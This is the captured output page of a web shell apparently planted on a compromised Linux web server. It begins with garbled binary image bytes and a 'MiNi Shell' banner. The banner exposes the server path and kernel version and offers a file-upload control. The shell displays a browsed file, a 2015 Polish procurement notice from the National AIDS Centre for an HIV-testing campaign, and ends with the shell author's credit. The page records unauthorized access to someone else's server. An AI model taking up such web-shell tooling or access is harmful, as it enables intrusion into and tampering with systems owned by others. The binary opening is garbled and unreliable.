JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150811/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150811/204702-N-2015.html

<p class="kh_header"><b>Warszawa: Usługa przygotowania i przeprowadzenia ogólnopolskiej kampanii społecznej pod hasłem 
Coś Was łączy? Zrób test na HIV. (oznaczenie sprawy: KC/AIDS/DZ/270-18/2015)</b><br>
<b>Numer ogłoszenia: 204702 - 2015; data zamieszczenia: 11.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Krajowe Centrum ds. AIDS , ul. Samsonowska 1, 02-829 Warszawa, woj. mazowieckie, tel. 022 3317777, faks 022 3317776.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.aids.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa przygotowania i przeprowadzenia ogólnopolskiej kampanii społecznej pod hasłem 
Coś Was łączy? Zrób test na HIV. (oznaczenie sprawy: KC/AIDS/DZ/270-18/2015).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa przygotowania i przeprowadzenia ogólnopolskiej kampanii społecznej pod hasłem Coś Was łączy? Zrób test na HIV. skierowanej do osób podejmujących ryzykowne zachowania, które mogą skutkować zakażeniem HIV.
2.	Przedmiot  zamówienia  obejmuje  przygotowanie  i  przeprowadzenie ogólnopolskich działań prozdrowotnych skierowanych do osób podejmujących ryzykowne zachowania, które mogą skutkować zakażeniem HIV. Działania powinny być prowadzone pod hasłem i logotypem Coś Was łączy? Zrób test na HIV. Działania mają na celu popularyzację wczesnej diagnostyki w kierunku HIV oraz upowszechnienie wiedzy o HIV i AIDS, a także sposobach zmniejszenia ryzyka zakażenia. 
3.	Cele działań prozdrowotnych prowadzonych pod hasłem i logotypem Coś was łączy? Zrób test na HIV. (dalej: Coś was łączy?) to: 
1)	popularyzacja wczesnej diagnostyki w kierunku HIV;
2)	budowanie poczucia odpowiedzialności za swoje zdrowie i zdrowie partnera seksualnego;
3)	upowszechnianie aktualnej wiedzy dot. HIV i AIDS;
4)	upowszechnianie informacji o sposobach zmniejszania ryzyka zakażenia.
Działanie prozdrowotne powinno promować aktualną wiedzę dot. HIV i AIDS w celu osiągnięcia konkretnych zmian w zachowaniach grupy docelowej. 
Zamawiający oczekuje przygotowania i realizacji kompleksowych działań skierowanych do grupy docelowej, które będą dostosowane do odbiorców, spójne, komunikowane odpowiednimi kanałami i przystępne w treści. Powinny w atrakcyjny sposób zwiększyć świadomość członków grup docelowych w zakresie wskazanych celów informacyjnych i umożliwiać odniesienie problemu do siebie, bez wprowadzania poczucia zagrożenia, czy bycia ocenianym. Powinny ułatwiać podejmowanie działań prozdrowotnych i zmianę postaw przez odbiorcę (realizacja celów wskazanych powyżej). 
Wykonawca powinien kierować się następującymi zasadami komunikowania podczas przygotowywania i realizacji działań prozdrowotnych: wiarygodnością informacji, praktycznością i przystępnością informacji.
4.	Zamawiający zamierza przeznaczyć na realizację zamówienia kwotę w wysokości 53 900,00 zł brutto. Przedmiot zamówienia obejmuje następujące działania prozdrowotne (wraz z planowanym budżetem jaki Zamawiający zamierza przeznaczyć na ich realizację):
1)	Element nr 1 Media relations - planowany budżet 6 500,00 zł brutto;
2)	Element nr 2 Strona internetowa Coś was łączy? Zrób test na HIV. - planowany budżet 4 500,00 zł brutto;
3)	Element nr 3 Internetowa akcja ambientowa - planowany budżet 28 500,00 zł brutto;
4)	Element nr 4 Druk i zawieszenie billboardu na budynku KC ds. AIDS - planowany budżet 1 500,00 zł brutto;
5)	Element nr 5 Plakat elektrostatyczny adhezyjny Coś was łączy? Zrób test na HIV. - planowany budżet 12 000,00 zł brutto;
6)	Element nr 6 Banery internetowe - planowany budżet 900,00 zł brutto.
5.	Szczegółowy opis przedmiotu zamówienia poszczególnych zadań zawiera odpowiednio Załącznik nr 1 do SIWZ. 
6.	Zamówienie winno zostać zrealizowane na zasadach określonych we wzorze umowy stanowiącym Załącznik nr 7 do SIWZ.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.34.22.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 04.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przed upływem terminu składania ofert Wykonawca zobowiązany jest wnieść wadium w kwocie 1 000,00 złotych.
2.	Wadium może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym 
że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
3)	gwarancjach bankowych; 
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.).
3.	Wadium winno zostać wniesione przed upływem terminu składania ofert, a dokument bądź dokumenty potwierdzające jego wniesienie, winny zostać dołączone do oferty. 
4.	Wadium wnoszone w pieniądzu winno zostać wpłacone przelewem na rachunek bankowy Zamawiającego, 
nr 90101010100177181391200000.
5.	Skuteczne wniesienie wadium w pieniądzu, następuje z chwilą uznania środków pieniężnych na rachunku bankowym Zamawiającego, przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).
6.	Z treści gwarancji/poręczenia winno wynikać bezwarunkowe zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy Pzp na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą.
7.	Okoliczności i zasady zwrotu wadium lub jego przepadku oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy określa ustawa Pzp</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - należycie wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, co najmniej trzy usługi, każda o wartości minimum 30 000,00 zł brutto, których przedmiotem było przygotowanie i przeprowadzenie działań promocyjnych o tematyce:
a)	społecznej związanej z integracją społeczną lub osobami wykluczonymi społecznie, lub osobami chorymi, lub osobami niepełnosprawnymi lub
b) zdrowotnej związanej z HIV/AIDS lub zakażeniami przenoszonymi drogą płciową, lub zdrowiem publicznym, 
/UWAGA: jeżeli Wykonawca, na potwierdzenie spełniania warunku, wykaże zamówienia, których wartość wyrażona jest w walucie innej niż PLN, winien on dokonać przeliczenia wartości zamówienia na PLN, wg średniego kursu publikowanego przez Narodowy Bank Polski z dnia wszczęcia niniejszego postępowania, tabela A - tabela średnich kursów walut obcych/.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>1) na podstawie § 1 ust. 4 rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013 r. poz. 231) Zamawiający określa, że usługi, których dotyczy obowiązek wskazania przez Wykonawcę w wykazie, o którym mowa powyżej, i złożenia dowodów potwierdzających ich należyte wykonanie, to wyłącznie usługi wystarczające dla potwierdzenia spełniania warunku udziału w postępowaniu opisanego w pkt III.3.2 ogłoszenia o zamówieniu oraz w dziale III ust. 1 pkt 2 SIWZ (w ten sam sposób należy rozumieć również pojęcie /główne usługi/), co oznacza, że wykaz nie musi zawierać wszystkich zrealizowanych przez Wykonawcę usług, w tym informacji o usługach niewykonanych lub wykonanych nienależycie;
2)	dowody, o których mowa powyżej, to:
a)	poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,
b)	oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej,
c)	w przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W celu umożliwienia dokonania oceny oferty w kryteriach oceny ofert opisanych w dziale XI SIWZ, Wykonawca zobowiązany jest złożyć wskazane poniżej dokumenty i projekty, które stanowią treść oferty i winny być zgodne z założeniami i wymaganiami określonymi w opisie przedmiotu zamówienia stanowiącym Załącznik nr 1 do SIWZ, nie podlegają one uzupełnieniu w trybie przewidzianym w art. 26 ust. 3 ustawy Pzp, a wszelkie błędy lub braki w nich stwierzdzone, powodujące niezgodność treści oferty z treścią SIWZ, skutkować będą odrzuceniem oferty na podstawie art. 89 ust. 1 pkt 2 ustawy Pzp:
a)	na potrzeby oceny elementu nr 1 Media relations: przykładowa informacja prasowa promująca przekaz działania profilaktycznego Coś was łączy? Zrób test na HIV. - 300 słów,
b)	na potrzeby oceny elementu nr 2 Strona internetowa Coś was łączy? Zrób test na HIV. :
-	projekt strony internetowej uwzględniający logo i hasło Coś was łączy? Zrób test na HIV.,
-	wybór treści tj. proponowany podział na segmenty (nagłówki) i przykładową treść jednego segmentu,
-	opis zastosowanych technologii internetowych,
projekt powinien zostać przedstawiony w wersji drukowanej na kartkach A4 lub A3 tak by zapewnić jego czytelność oraz dodatkowo (fakultatywnie) w formie elektronicznej na CD lub DVD lub Pen Drive. Projekt strony powinien być zgodny z kreacją Coś was łączy? i spójny z pozostałymi elementami działania profilaktycznego.
c)	na potrzeby oceny elementu nr 3 Internetowa akcja ambientowa: graficzna odsłona akcji oraz słowny opis (do 2 str. A4, Times New Roman, 12, interlinia 1,5, standardowe marginesy) zawierający następujące informacje: 
-	w jaki sposób treść i forma proponowanej akcji są spójne z treścią, formą i kontekstem przekazu działania Coś was łączy? Zrób test na HIV.,
-	w jaki sposób dana akcja pozwoli osiągnąć cel Coś was łączy?,
-	wytłumaczenie na czym polega innowacyjność propozycji,
-	wskazanie planowanego sposobu mierzenia efektów akcji.  
Projekt i opis powinny zostać przedstawione w wersji drukowanej na kartkach A4 lub A3 tak by zapewnić jego czytelność oraz dodatkowo (fakultatywnie) w formie elektronicznej na CD lub DVD lub Pen Drive.
2. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4.3 ogłoszenia, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem, wystawionym nie wcześniej niż w terminach określonych dla poszczególnych rodzajów dokumentów. 
3. Wymagania jakie musi spełniać oferta składana przez dwa lub więcej podmiotów (Wykonawców ubiegających się wspólnie o udzielenie zamówienia np. konsorcja, spółki cywilne): 1) każdy z Wykonawców oddzielnie musi udokumentować brak podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy Pzp oraz art. 24 ust. 2 pkt 5 ustawy Pzp; 2) co najmniej jeden z Wykonawców lub kilku z nich łącznie muszą spełniać warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy PZP, w zakresie opisanym przez Zamawiającego; 3) oferta musi być podpisana w taki sposób, aby prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie; 4) Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy; 5) wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako reprezentant pozostałych. 
4. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp oraz nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 ustawy Pzp. 
5. Wykonawca zobowiązany jest wykazać na podstawie oświadczeń i dokumentów złożonych wraz z ofertą, że spełnia warunki udziału w postępowaniu oraz że nie podlega wykluczeniu z postępowania o udzielenie zamówienia publicznego. 
6. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty zgodnie z formułą spełnia/nie spełnia. 
7.	Oferta winna być podpisana przez osobę upoważnioną do reprezentowania Wykonawcy zgodnie z formą reprezentacji wynikającą z treści właściwego dokumentu rejestracyjnego bądź na podstawie załączonego do oferty pełnomocnictwa. 
8.	Dokumenty sporządzone w językach obcych winny zostać złożone wraz z tłumaczeniem na język polski. 
9.	Dokumenty mogą być składane w oryginale lub w formie kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 
10.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których Wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy Pzp, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów winny być poświadczane za zgodność z oryginałem przez Wykonawcę lub te podmioty. 
11. Jeżeli Wykonawca, wykazując spełnienie warunków udziału w postępowaniu polega na zasobach innych pod-miotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, zobowiązany jest, oprócz oświadczeń i dokumentów wymienionych powyżej, dodatkowo: 1)	udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (w oryginale lub kopii poświadczonej notarialnie, podpisane przez osobę upoważnioną do reprezentacji tego podmiotu na podstawie dokumentu rejestrowego lub pełnomocnictwa - złożonych wraz ze zobowiązaniem) z przedstawionych dowodów winien wynikać: 
a) zakres zobowiązania podmiotu trzeciego, 
b) rodzaj i zakres udostępnianych zasobów, 
c) sposób udostępnienia zasobów, 
d) podmiot, któremu zasoby zostaną udostępnione, 
e) charakter stosunku łączącego oba te podmioty, 
f) okres, na który podmiot trzeci udostępnia zasoby, 
g) w przypadku, gdy przedmiotem udostępnienia są zasoby nierozerwalnie związane z podmiotem ich udzielającym, niemożliwe do samodzielnego obrotu i dalszego udzielenia bez zaangażowania tego podmiotu w wykonanie zamówienia (w szczególności dotyczy to wiedzy i doświadczenia podmiotu trzeciego), taki dokument powinien zawierać wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia wraz ze wskazaniem zakresu i okresu uczestnictwa podmiotu trzeciego w wykonaniu zamówienia, gwarantującego realne przekazanie zasobów, na których polega Wykonawca, tj. zgodnego z zakresem, w jakim zasoby te są wykorzystywane w celu wykazania spełniania warunków udziału w postępowaniu; 
2) w przypadku, gdy podmiot udostępniający Wykonawcy swoje zasoby będzie brał udział w realizacji części zamówienia - Wykonawca zobowiązany jest złożyć w odniesieniu do tego podmiotu dokumenty wymienione w III.4.2 ogłoszenia, przy czym za udział w realizacji części zamówienia uważa się każdą formę uczestnictwa podmiotu trzeciego w jego realizacji (także konsultacje i doradztwo); 
3) postanowienia dotyczące Wykonawców, którzy mają siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej stosuje się odpowiednio.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Ocena elementów kreatywnych - 60</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.aids.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego - ul. Samsonowska 1, 02 - 829 Warszawa; sekretariat@aids.gov.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.08.2015 godzina 09:30, miejsce: Siedziba Zamawiającego - ul. Samsonowska 1, 02 - 829 Warszawa, recepcja.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Termin wykonania zamówienia określony w pkt II.2 ogłoszenia o zamówieniu winien brzmieć: Wykonawca zobowiązany jest do wykonania przedmiotu zamówienia w terminie do 4 grudnia 2015 r., zgodnie z wymaganiami określonymi w Załączniku nr 1 do SIWZ oraz zgodnie z harmonogramem sporządzonym przez Wykonawcę po podpisaniu umowy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com